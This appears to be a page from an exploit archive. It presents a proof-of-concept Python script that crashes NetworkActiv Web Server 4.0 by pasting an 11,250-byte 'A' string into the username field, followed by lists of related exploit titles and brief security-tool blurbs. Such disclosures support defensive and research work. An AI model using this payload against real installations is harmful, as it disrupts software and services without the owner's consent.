Menu

Search for hundreds of thousands of exploits

"NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)"

Author

Exploit author

"Victor Mondragón"

Platform

Exploit platform

windows_x86-64

Release date

Exploit published date

2018-08-30

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
#Exploit Title: NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-08-30
#Vendor Homepage: https://www.networkactiv.com/WebServer.html
#Software Link: https://www.networkactiv.com/Dev/
#Tested Version: 4.0 Pre-Alpha-3.7.2
#Tested on: Windows 10 Single Language x64

#Steps to produce the crash:
#1.- Run python code: NetworkActiv_Web_Server_4.0_PA_3.7.2.py
#2.- Open Network.txt and copy content to clipboard
#2.- Open NetworkActiv Web Server 4.0 
#3.- Select Security options 
#4.- Select "Set username" and Paste ClipBoard on "New Value" 
#6.- Select "Set password" and Put "1234" on "New Value" 
#7.- Crashed

cod = "\x41" * 11250

f = open('Network.txt', 'w')
f.write(cod)
f.close()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-01-07 "Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP)" local windows_x86-64 bluefrostsec
2019-12-07 "Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack" local windows_x86-64 "Axel Souchet"
2019-11-03 "DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable'" local windows_x86-64 Mumbai
2019-10-07 "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)" local windows_x86-64 max7253
2019-08-16 "GetGo Download Manager 6.2.2.3300 - Denial of Service" dos windows_x86-64 "Malav Vyas"
2019-01-28 "CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)" remote windows_x86-64 "Matteo Malvica"
2019-01-02 "EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)" dos windows_x86-64 Achilles
2019-01-02 "NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)" dos windows_x86-64 "Luis Martínez"
2019-01-02 "NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)" dos windows_x86-64 "Luis Martínez"
2018-11-16 "Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
Release Date Title Type Platform Author
2019-05-24 "Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-21 "Deluge 1.3.15 - 'URL' Denial of Service (PoC)" dos multiple "Victor Mondragón"
2019-05-21 "Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-16 "ZOC Terminal 7.23.4 - 'Script' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-16 "Axessh 4.2 - 'Log file name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-16 "ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-16 "ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-13 "SpotMSN 2.4.6 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-13 "DNSS 2.1.8 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-10 "PHPRunner 10.1 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-10 "jetCast Server 2.0 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-10 "ASPRunner.NET 10.1 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-08 "jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-30 "SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-26 "NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-26 "NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-25 "HeidiSQL 10.1.0.5464 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-25 "Backup Key Recovery 2.2.4 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-17 "DHCP Server 2.5.2 - Denial of Service (PoC)" dos windows "Victor Mondragón"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.